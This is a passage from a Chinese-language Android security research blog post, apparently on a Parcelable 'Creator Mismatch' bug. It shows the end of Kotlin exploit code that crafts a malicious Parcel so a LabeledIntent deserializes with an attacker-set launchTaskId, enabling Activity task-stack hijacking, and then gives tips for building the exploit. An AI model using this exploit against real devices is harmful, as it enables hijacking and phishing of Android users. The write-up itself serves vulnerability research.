              <span class="nf">writeInt</span><span class="p">(</span><span class="nf">fixme</span><span class="p">(</span><span class="mi">172</span><span class="p">))</span> <span class="c1">//  URLSpan.mURL.chars.1.01  =&gt;  back patch length</span>
              <span class="nf">writeInt</span><span class="p">(</span><span class="nc">Const</span><span class="p">.</span><span class="nc">BundleMagic</span><span class="p">)</span>  <span class="c1">// URLSpan.mURL.chars.1.23 =&gt; 'B' 'N' 'D' 'L'</span>
              <span class="nf">writeInt</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span> <span class="c1">// URLSpan.mURL.chars.1.45 =&gt; entry count</span>

              <span class="c1">// URLSpan.mURL.chars going on ...</span>
              <span class="nf">writeString</span><span class="p">(</span><span class="s">"android.activity.launchTaskId"</span><span class="p">)</span> <span class="c1">//  key 1</span>
              <span class="nf">writeValue</span><span class="p">(</span><span class="n">taskId</span><span class="p">)</span> <span class="c1">// value 1</span>
              <span class="nf">writeString</span><span class="p">(</span><span class="s">"_"</span><span class="p">)</span> <span class="c1">// key 2</span>
              <span class="nf">run</span> <span class="p">{</span>  <span class="c1">// value 2</span>
                <span class="nf">writeInt</span><span class="p">(</span><span class="nc">Const</span><span class="p">.</span><span class="nc">ValByteArray</span><span class="p">)</span> <span class="c1">// VAL_BYTEARRAY</span>
                <span class="nf">writeInt</span><span class="p">(</span><span class="nf">fixme</span><span class="p">(</span><span class="mi">80</span><span class="p">))</span> <span class="c1">// byte array length</span>
                <span class="nf">writeInt</span><span class="p">(</span><span class="sc">'@'</span><span class="p">.</span><span class="n">code</span><span class="p">)</span> <span class="c1">//  0 &lt;-- byte array content start here</span>
                <span class="nf">writeInt</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="c1">// &lt;--- URLSpan.mURL.chars ends here with terminator</span>
              <span class="p">}</span>
            <span class="p">}</span>

            <span class="c1">// byte array content going on ...</span>
            <span class="nf">writeInt</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="c1">// span.start</span>
            <span class="nf">writeInt</span><span class="p">(</span><span class="mi">2</span><span class="p">)</span> <span class="c1">// span.end</span>
            <span class="nf">writeInt</span><span class="p">(</span><span class="mi">3</span><span class="p">)</span> <span class="c1">// span.flags</span>
            <span class="nf">writeInt</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="c1">// end flag</span>
          <span class="p">}</span>

          <span class="c1">// byte array content going on ...</span>
          <span class="nf">writeInt</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="c1">// Icon</span>
        <span class="p">}</span>

        <span class="kd">val</span> <span class="py">labeled</span> <span class="p">=</span> <span class="nc">Parcel</span><span class="p">.</span><span class="nf">obtain</span><span class="p">().</span><span class="nf">apply</span> <span class="p">{</span>
          <span class="nf">appendFrom</span><span class="p">(</span><span class="n">intent</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">intent</span><span class="p">.</span><span class="nf">dataSize</span><span class="p">())</span>
          <span class="nf">appendFrom</span><span class="p">(</span><span class="n">tail</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">tail</span><span class="p">.</span><span class="nf">dataSize</span><span class="p">())</span>
        <span class="p">}</span>

        <span class="n">labeled</span><span class="p">.</span><span class="nf">setDataPosition</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
        <span class="k">return</span> <span class="nc">LabeledIntent</span><span class="p">.</span><span class="nc">CREATOR</span><span class="p">.</span><span class="nf">createFromParcel</span><span class="p">(</span><span class="n">labeled</span><span class="p">)</span>
      <span class="p">}</span>
</pre></td></tr></tbody></table></code></div></div>

<p>通过上面的代码，我们就构造出了合法的 LabeledIntent， 当它连接上 startActivity 的其他参数， 并且被当做 Intent 反序列化之后，就可以达到了修改 launchTaskId ,最后把我们的 Activity 启动到某个存在的系统的 Activity 堆栈中，之后就可以用堆栈劫持技巧做攻击了</p>

<h2 id="epilogue"><span class="me-2">Epilogue</span><a href="#epilogue" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<p>总结一下在构造 Exp 的过程中值得注意的点</p>

<ul>
  <li>如果读取到 binder 的 hdr 不为预设的两个 header, 则会返回 null 作为 binder 的值,但是这时候不会去读 binder 的 stability,导致整个 null binder 只消耗掉 24 个字节而不是正常的 28 个字节</li>
  <li>在使用 readInPlace 读取一段连续数据之后, 会检查该 Parcel 对应的这段数据是否关联了 binder, 如果是的话, 虽然数据会被消耗,但是上层只能拿到 nullptr 作为读取内容,</li>
  <li>String8 格式写入字符串之后,对端在读入时会对 String8 的合法性做校验,这也是为什么我们不把 mNonLocalizedLabel 序列化为看起来更为简单的路径一的原因, 我们需要在里面藏入太多的 payload,很难保证这段 payload 同时也是合法的 String8 编码的字符串,比如中间加了很多的 0 就会导致校验失败,而 String16 就没有对应的校验</li>
  <li>上面构造的 bundle 我们需要保证 ByteArray 是在后面被序列化， 虽然 Bundle 本身是无序的，但是实际山使用 key 的 hashCode 来做顺序，我们需要谨慎的选择这个 key，这里的 ‘_’, 就能达到这个要求</li>
</ul>

<p>这个漏洞出现的根本原因，在于 Parcelable 的实现类存在子类，然后父类被用在了 aidl 参数中，基于这种模式，我们可以利用 codeql 批量查询 AOSP 中存在的这种类以及对应的 aidl 接口，我简单的试了一下，结果集中在 Uri 和 SavedState，遗憾的是并没有找到可以利用的点，其中 Uri 的子类共用一个 Creator，这个 Creator 中考虑了所有可能的子类的序列化情况</p>

  </div>

  <div class="post-tail-wrapper text-muted">
    <!-- categories -->
    

    <!-- tags -->
    

    <div
      class="
        post-tail-bottom
        d-flex justify-content-between align-items-center mt-5 pb-2
      "
    >
      <div class="license-wrapper">
        
          

          This post is licensed under 
        <a href="https://creativecommons.org/licenses/by/4.0/">
          CC BY 4.0
        </a>
         by the author.
        
      </div>

      <!-- Post sharing snippet -->

<div class="share-wrapper d-flex align-items-center">
  <span class="share-label text-muted">Share</span>
  <span class="share-icons">
    
    
    

    

      

      <a href="https://twitter.com/intent/tweet?text=Creator%20Mismatch%20-%20%E5%BC%80%E5%85%83%E7%B1%B3%E7%B2%89%E5%AE%9E%E5%8A%9B%E4%BB%A3%E8%B4%AD&url=https%3A%2F%2Fkonata.github.io%2Fposts%2Fcreator-mismatch%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Twitter" aria-label="Twitter">
        <i class="fa-fw fab fa-twitter"></i>
      </a>
    

      

      <a href="https://t.me/share/url?url=https%3A%2F%2Fkonata.github.io%2Fposts%2Fcreator-mismatch%2F&text=Creator%20Mismatch%20-%20%E5%BC%80%E5%85%83%E7%B1%B3%E7%B2%89%E5%AE%9E%E5%8A%9B%E4%BB%A3%E8%B4%AD" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Telegram" aria-label="Telegram">
        <i class="fa-fw fab fa-telegram"></i>
      </a>
    

    <button
      id="copy-link"
      aria-label="Copy link"
      class="btn small"
      data-bs-toggle="tooltip"
      data-bs-placement="top"
      title="Copy link"
      data-title-succeed="Link copied successfully!"
    >
      <i class="fa-fw fas fa-link pe-none fs-6"></i>
    </button>
  </span>
</div>

    </div>
    <!-- .post-tail-bottom -->
  </div>
  <!-- div.post-tail-wrapper -->
</article>


            
          </main>

          <!-- panel -->
          <aside aria-label="Panel" id="panel-wrapper" class="col-xl-3 ps-2 text-muted">
            <div class="access">
              <!-- Get 5 last posted/updated posts -->














  <section id="access-lastmod">
    <h2 class="panel-heading">Recently Updated</h2>
    <ul class="content list-unstyled ps-0 pb-1 ms-1 mt-2">
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/android-application-installation/">Android’s Install Flow: A treasure map for exploit crafters</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/samsung-bugbounty-scam/">Samsung’s ISVP: Betraying the trust of security researchers</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/android-screen-cast-issues/">"Screen leakage"</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/creator-mismatch/">Creator Mismatch</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/creator-mismatch-cont/">Creator Mismatch 续</a>
        </li>
      
    </ul>
  </section>
  <!-- #access-lastmod -->


              <!-- The trending tags list -->


















            </div>

            
              
              






  <div class="toc-border-cover z-3"></div>
  <section id="toc-wrapper" class="invisible position-sticky ps-0 pe-4 pb-4">
    <h2 class="panel-heading ps-3 pb-2 mb-0">Contents</h2>
    <nav id="toc"></nav>
  </section>


            
          </aside>
        </div>

        <div class="row">
          <!-- tail -->
          <div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              
              <!-- Recommend the other 3 posts according to the tags and categories of the current post. -->

<!-- The total size of related posts -->


<!-- An random integer that bigger than 0 -->


<!-- Equals to TAG_SCORE / {max_categories_hierarchy} -->


























            
              
              <!-- Navigation buttons at the bottom of the post. -->

<nav class="post-navigation d-flex justify-content-between" aria-label="Post Navigation">
  
  

  
    <a
      href="/posts/android-screen-cast-issues/"
      class="btn btn-outline-primary"
      aria-label="Older"
    >
      <p>"Screen leakage"</p>
    </a>
  

  
    <a
      href="/posts/creator-mismatch-cont/"
      class="btn btn-outline-primary"
      aria-label="Newer"
    >
      <p>Creator Mismatch 续</p>
    </a>
  
</nav>

            

            <!-- The Footer -->

<footer
  aria-label="Site Info"
  class="
    d-flex flex-column justify-content-center text-muted
    flex-lg-row justify-content-lg-between align-items-lg-center pb-lg-3
  "
>
  <p>©
    <time>2025</time>

    
      <a href="https://twitter.com/minamikazecafe">natsuki</a>.
    

    
      <span
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author."
      >Some rights reserved.</span>
    
  </p>

  <p>Using the <a
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="v7.3.0"
        href="https://github.com/cotes2020/jekyll-theme-chirpy"
        target="_blank"
        rel="noopener"
      >Chirpy</a> theme for <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a>.
  </p>
</footer>

          </div>
        </div>

        <!-- The Search results -->

<div id="search-result-wrapper" class="d-flex justify-content-center d-none">
  <div class="col-11 content">
    <div id="search-hints">
      <!-- The trending tags list -->


















    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>

      </div>

      <aside aria-label="Scroll to Top">
        <button id="back-to-top" type="button" class="btn btn-lg btn-box-shadow">
          <i class="fas fa-angle-up"></i>
        </button>
      </aside>
    </div>

    <div id="mask" class="d-none position-fixed w-100 h-100 z-1"></div>

    
      <aside
  id="notification"
  class="toast"
  role="alert"
  aria-live="assertive"
  aria-atomic="true"
  data-bs-animation="true"
  data-bs-autohide="false"
>
  <div class="toast-header">
    <button
      type="button"
      class="btn-close ms-auto"
      data-bs-dismiss="toast"
      aria-label="Close"
    ></button>
  </div>
  <div class="toast-body text-center pt-0">
    <p class="px-2 mb-3">A new version of content is available.</p>
    <button type="button" class="btn btn-primary" aria-label="Update">
      Update
    </button>
  </div>
</aside>

    

    <!-- Embedded scripts -->

    
      
      <!-- The comments switcher -->


    

    <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->





<script>
  
  document.addEventListener('DOMContentLoaded', () => {
    SimpleJekyllSearch({
      searchInput: document.getElementById('search-input'),
      resultsContainer: document.getElementById('search-results'),
      json: '/assets/js/data/search.json',
      searchResultTemplate: '  <article class="px-1 px-sm-2 px-lg-4 px-xl-0">    <header>      <h2><a href="{url}">{title}</a></h2>      <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">        {categories}        {tags}      </div>    </header>    <p>{content}</p>  </article>',
      noResultsText: '<p class="mt-5">Oops! No results found.</p>',
      templateMiddleware: function(prop, value, template) {
        if (prop === 'categories') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div class="me-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
          }
        }

        if (prop === 'tags') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
          }
        }
      }
    });
  });
</script>

  </body>
</html>

